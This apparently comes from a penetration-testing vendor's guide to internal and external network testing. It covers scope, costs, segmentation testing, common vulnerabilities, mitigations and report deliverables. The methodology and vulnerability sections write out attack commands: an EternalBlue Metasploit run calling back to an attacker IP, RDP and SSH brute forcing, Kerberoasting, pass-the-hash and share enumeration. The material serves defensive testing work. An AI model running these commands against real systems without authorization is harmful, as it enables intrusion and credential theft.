Network VAPT: Internal vs External Testing Guide 2026

Network infrastructure represents the attack surface that 68% of breaches target according to Verizon's 2026 Data Breach Investigations Report. Network Vulnerability Assessment and Penetration Testing (VAPT) identifies security weaknesses in network architecture, device configurations, segmentation controls, and access mechanisms before attackers exploit them. Comprehensive network VAPT combines automated vulnerability scanning with manual exploitation testing, covering both internet-facing perimeter defenses and internal lateral movement paths.

This guide explains network VAPT methodology including internal vs external testing approaches, segmentation validation, common network vulnerabilities, exploitation techniques, and real-world attack scenarios helping organizations secure network infrastructure against modern threats.

External vs Internal Network Testing

External Network Penetration Testing

Perspective: Testing from internet attacker viewpoint without internal network access

Scope:

• Public-facing IP addresses and domains
• Firewall and perimeter security
• VPN endpoints
• Email infrastructure (SMTP, webmail)
• DNS configuration and zone transfers
• Remote access services (RDP, SSH exposed)
• Cloud infrastructure (AWS, Azure, GCP)

Common Findings:

• Outdated VPN appliances vulnerable to known CVEs
• Exposed management interfaces (admin panels, routers)
• Weak authentication on remote services
• Misconfigured firewalls allowing unnecessary inbound access
• DNS information disclosure
• TLS/SSL misconfigurations and weak ciphers

Testing Duration: 3-5 business days

Typical Cost: $8,000-$20,000

Internal Network Penetration Testing

Perspective: Testing from insider threat or compromised endpoint scenario

Scope:

• Internal network segmentation
• Active Directory security
• Lateral movement paths
• Privilege escalation opportunities
• Internal applications and services
• Database security
• File share permissions
• Network device management interfaces

Common Findings:

• Flat network architecture allowing unrestricted lateral movement
• Active Directory misconfigurations (Kerberoasting, AS-REP roasting)
• Weak or default credentials on internal services
• Outdated operating systems and applications
• Excessive file share permissions
• Unencrypted internal protocols (Telnet, HTTP, FTP)
• Server Message Block (SMBv1) enabled

Testing Duration: 5-7 business days

Typical Cost: $12,000-$25,000

Combined External + Internal Testing: Most organizations should conduct both annually, providing comprehensive coverage of network attack surface. Combined assessments typically cost $18,000-$40,000.

Network VAPT Methodology

Phase 1: Reconnaissance and Discovery

Objectives: Identify live hosts, open ports, running services, and network topology

Techniques:

Host Discovery:

nmap -sn 192.168.1.0/24
nmap -PE -PP -PM 10.0.0.0/8
masscan -p80,443,8080,8443 target-range --rate=10000

Port Scanning:

nmap -sS -p- -T4 target-ip
nmap -sV -sC --top-ports 1000 target-range
nmap -sU -p 53,67,123,161,500,1434 target-ip

Service Enumeration:

nmap -sV -p 1-65535 target-ip
nmap --script banner target-ip

OS Fingerprinting:

nmap -O target-ip
xprobe2 target-ip

Phase 2: Vulnerability Identification

Automated Scanning:

Professional vulnerability scanners like Nessus, Qualys, or OpenVAS identify known CVE vulnerabilities, misconfigurations, and security weaknesses:

• Operating system vulnerabilities
• Network service vulnerabilities
• Missing security patches
• Weak SSL/TLS configurations
• Default credentials
• Configuration auditing against CIS benchmarks

Manual Verification:

Security testers validate scanner findings, eliminating false positives and identifying vulnerabilities automated tools miss:

• Custom application vulnerabilities
• Logic flaws in network architecture
• Business-specific security weaknesses
• Complex authentication bypass opportunities

Phase 3: Exploitation

Testing validates whether vulnerabilities are exploitable and demonstrates real-world impact:

Common Network Exploitation Scenarios:

SMB Exploitation (EternalBlue CVE-2017-0144):

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST attacker-ip
exploit

RDP Brute Force:

hydra -l administrator -P passwords.txt rdp://target-ip
crowbar -b rdp -s target-ip/32 -u admin -C passwords.txt

SSH Credential Testing:

hydra -L users.txt -P passwords.txt ssh://target-ip
medusa -h target-ip -U users.txt -P passwords.txt -M ssh

SNMP Community String Brute Force:

nmap -sU -p 161 --script snmp-brute target-range
onesixtyone -c community-strings.txt target-range

Phase 4: Post-Exploitation and Lateral Movement

After initial compromise, testing validates:

• Ability to move laterally across network segments
• Privilege escalation to domain administrator or root
• Access to sensitive data or critical systems
• Persistence mechanisms for maintaining access
• Detection capability of SOC monitoring

Active Directory Attack Examples:

Kerberoasting:

GetUserSPNs.py domain/user:password -dc-ip dc-ip -request
hashcat -m 13100 tickets.txt wordlist.txt

Pass-the-Hash:

pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:ntlm-hash //target-ip cmd
crackmapexec smb target-range -u user -H ntlm-hash

BloodHound (AD Path Analysis):

bloodhound-python -d domain.com -u user -p password -dc dc.domain.com -c all
# Identify shortest path to domain admin

Network Segmentation Testing

Segmentation validation ensures security boundaries actually prevent lateral movement:

Why Segmentation Matters

Proper network segmentation limits breach impact:

• Compromised workstation cannot directly access database servers
• Guest WiFi isolated from corporate network
• Payment processing systems separated from general IT
• OT/SCADA networks isolated from business systems
• Development environments separated from production

Without effective segmentation, attackers achieving initial access can freely move laterally, accessing all network resources. The 2021 Colonial Pipeline ransomware attack demonstrated this: attackers compromised one system and moved laterally across flat network, ultimately disrupting operations.

Segmentation Testing Methodology

Testing Approach:

1. Obtain access to low-security segment (guest WiFi, conference room network)
2. Attempt to access higher-security segments (corporate network, server VLAN, database segment)
3. Test both network-layer (routing, firewall rules) and application-layer controls
4. Validate access controls prevent unauthorized traversal
5. Document bypass techniques if segmentation fails

Common Segmentation Failures:

• Firewall rules allowing "any to any" between segments
• Shared credentials across security boundaries
• Jump boxes or management servers bridging segments
• DNS, DHCP, or other shared services providing pivot points
• VPN providing full network access instead of segmented access

PCI DSS specifically requires segmentation testing validating cardholder data environment (CDE) isolation from other networks. Organizations processing payments must demonstrate segmentation effectiveness annually.

Common Network Vulnerabilities

SMB Vulnerabilities

EternalBlue (CVE-2017-0144):

• Affects unpatched Windows systems (XP through Server 2016)
• Used in WannaCry and NotPetya ransomware attacks
• Allows remote code execution without authentication
• Estimated 1.1 million systems remain vulnerable in 2026

SMBv1 Protocol Weakness:

• Outdated protocol with multiple known vulnerabilities
• Microsoft recommends disabling SMBv1
• Still found in 23% of enterprise networks (2026 surveys)

Detection and Exploitation:

nmap -p 445 --script smb-vuln-ms17-010 target-range
use exploit/windows/smb/ms17_010_eternalblue

RDP Vulnerabilities

BlueKeep (CVE-2019-0708):

• Pre-authentication remote code execution in RDP
• Wormable (can spread without user interaction)
• Affects Windows 7, Server 2008, and earlier

RDP Brute Force:

• 54% of internet-exposed RDP services experience brute force attacks
• Default port 3389 heavily targeted
• Weak passwords often lead to compromise

Mitigation:

• Never expose RDP directly to internet
• Require VPN access before RDP
• Implement multi-factor authentication
• Use non-standard ports (minimal security improvement)
• Enable Network Level Authentication (NLA)

SSH Vulnerabilities

Common SSH Weaknesses:

• Password authentication allowing brute force (use key-based authentication)
• Root login permitted (disable PermitRootLogin)
• Outdated SSH versions with known vulnerabilities
• Weak encryption algorithms enabled

SSH Hardening:

# /etc/ssh/sshd_config
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
Protocol 2
Ciphers aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-512,hmac-sha2-256

Network Device Vulnerabilities

Routers, switches, and firewalls frequently have security weaknesses:

• Default Credentials: Many network devices ship with default usernames/passwords never changed
• Outdated Firmware: Network devices often lack regular patching
• Management Interface Exposure: HTTP/Telnet management accessible from untrusted networks
• SNMP Community Strings: Default "public" and "private" strings allowing device enumeration

Testing Commands:

nmap -p 161 -sU --script snmp-info target-range
snmpwalk -v 2c -c public target-ip
cisco-torch -A target-ip

Internal Network Attack Chains

Scenario 1: Initial Access to Domain Admin

Attack Chain:

1. Initial Compromise: Phishing email delivers malware to user workstation
2. Credential Theft: Mimikatz extracts cached domain credentials from memory
3. Lateral Movement: Use stolen credentials accessing additional systems
4. Privilege Escalation: Kerberoasting extracts service account credentials
5. Domain Admin: Service account has domain admin rights
6. Full Control: Attacker controls entire Active Directory environment

Typical Duration: 2-4 hours from initial access to domain admin

Prevention:

• Implement endpoint detection and response (EDR) detecting Mimikatz
• Enforce least privilege (no service accounts with domain admin)
• Enable credential guard on Windows 10/11
• Monitor for Kerberos attack patterns
• Implement network segmentation limiting lateral movement

Scenario 2: Exploiting Network Shares

Attack Chain:

1. Share Enumeration: Identify accessible network file shares
2. Permission Testing: Enumerate readable and writable shares
3. Sensitive Data Discovery: Find passwords, configuration files, or databases
4. Credential Reuse: Use discovered credentials accessing additional systems

Enumeration Commands:

crackmapexec smb target-range -u guest -p '' --shares
smbmap -H target-ip -u guest
enum4linux -a target-ip

Prevention:

• Audit all share permissions (disable "Everyone" full control)
• Remove unnecessary shares
• Never store credentials in plaintext on file shares
• Implement DLP monitoring sensitive data access

Network Vulnerability Assessment Scope

Comprehensive network vulnerability assessment should cover:

Infrastructure Components

• Servers: Windows, Linux, Unix systems
• Workstations: Employee desktops and laptops
• Network Devices: Routers, switches, firewalls, load balancers
• Wireless Access Points: WiFi infrastructure
• VPN Concentrators: Remote access infrastructure
• Printers and IoT: Network-connected devices

Cloud and Hybrid Environments

• Cloud Infrastructure: AWS EC2, Azure VMs, GCP Compute instances
• Cloud Services: S3 buckets, blob storage, managed databases
• Hybrid Connectivity: Site-to-site VPNs, Direct Connect, ExpressRoute
• Container Platforms: Kubernetes, Docker, ECS

Specialized Systems

• OT/SCADA: Industrial control systems (tested during maintenance windows)
• Medical Devices: Healthcare organizations with networked medical equipment
• Building Management: HVAC, physical security systems

Internal vs External Testing Comparison

Aspect	External Testing	Internal Testing
Attacker Perspective	External threat actor or opportunistic attacker	Insider threat or compromised employee
Starting Position	Internet with no internal access	Inside network perimeter
Primary Focus	Perimeter security, gaining initial access	Lateral movement, privilege escalation
Scope	Public IPs, domains, cloud infrastructure	Internal networks, AD, databases, apps
Duration	3-5 days	5-7 days
Cost	$8,000-$20,000	$12,000-$25,000
Compliance	Required by PCI DSS, SOC 2	Required by PCI DSS, recommended for all

Network VAPT Deliverables

Professional network VAPT produces comprehensive documentation:

Executive Summary

• High-level overview of security posture
• Risk rating (critical, high, medium, low findings counts)
• Business impact of critical findings
• Year-over-year comparison if repeat assessment

Technical Report

• Detailed vulnerability descriptions
• CVSS scores and risk ratings
• Proof-of-concept demonstrating exploitability
• Affected systems and services
• Remediation recommendations with technical steps
• References to CVE, CWE, and remediation guides

Network Diagram

• Discovered network topology
• Segmentation boundaries
• Attack paths and lateral movement opportunities
• Critical assets and exposure

Remediation Roadmap

• Prioritized action items based on risk
• Quick wins (configuration changes)
• Short-term fixes (patching, access controls)
• Long-term improvements (architecture changes)
• Estimated remediation timelines

Network VAPT Testing Frequency

External Network Testing

• Annual Minimum: Required by most compliance frameworks
• After Significant Changes: New infrastructure, cloud migrations, perimeter modifications
• Post-Incident: After security breach validating remediation
• Quarterly: High-risk or highly regulated organizations

Internal Network Testing

• Annual Minimum: Required by PCI DSS and recommended for all organizations
• After Major Changes: Network redesigns, new VLANs, segmentation implementations
• Semi-Annual: Organizations with dynamic environments or mature security programs

Vulnerability Scanning

• Weekly or Continuous: Best practice for mature programs
• Monthly Minimum: Acceptable for smaller organizations
• Quarterly: Absolute minimum for PCI DSS compliance

Organizations should combine regular vulnerability scanning detecting known issues with periodic penetration testing validating exploitability and demonstrating real-world attack scenarios.

Selecting Network VAPT Providers

When outsourcing network VAPT:

Required Qualifications

• Certifications: OSCP, GPEN, CEH, GXPN
• Compliance Experience: PCI DSS, HIPAA, SOC 2 testing experience
• Methodology: PTES, OWASP, NIST SP 800-115 based testing
• References: Similar-sized organizations in your industry

Questions to Ask

• What tools and methodologies do you use?
• How do you prioritize findings?
• What deliverables are included?
• Do you provide remediation validation?
• What is your approach to segmentation testing?
• How do you handle sensitive production systems?
• Are your testers full-time employees or contractors?

Red Flags

• Lowest-price provider (corners likely cut)
• Automated-only testing without manual validation
• No certified security professionals
• Generic reports without organization-specific analysis
• Unwilling to provide references or sample reports

Emerging Network Security Considerations

Zero Trust Architecture

Organizations implementing Zero Trust should test:

• Micro-segmentation effectiveness
• Identity and access management controls
• Continuous authentication and authorization
• Lateral movement prevention despite single system compromise

SD-WAN Security

Software-Defined Wide Area Networks require testing:

• SD-WAN controller security
• Encryption between sites
• Access controls and segmentation
• Cloud connectivity security

5G and Edge Computing

5G networks and edge computing introduce new attack surfaces:

• Edge device security
• 5G network slicing isolation
• Distributed architecture vulnerabilities

Taking Action

Organizations should implement comprehensive network VAPT through these steps:

1. Asset Inventory: Document all network devices, servers, and infrastructure
2. Establish Baseline: Conduct initial external and internal penetration test
3. Implement Scanning: Deploy monthly or weekly vulnerability scanning
4. Remediate Findings: Address critical and high-severity vulnerabilities within SLAs
5. Annual Validation: Repeat penetration tests annually
6. Continuous Improvement: Track metrics demonstrating security posture improvement

subrosa provides comprehensive network penetration testing covering both external perimeter security and internal lateral movement testing. Our OSCP and GPEN certified testers combine automated vulnerability scanning with manual exploitation validating real-world attack scenarios. We test network segmentation effectiveness, Active Directory security, credential theft paths, and lateral movement opportunities providing detailed technical reports with prioritized remediation guidance meeting PCI DSS, HIPAA, and SOC 2 requirements.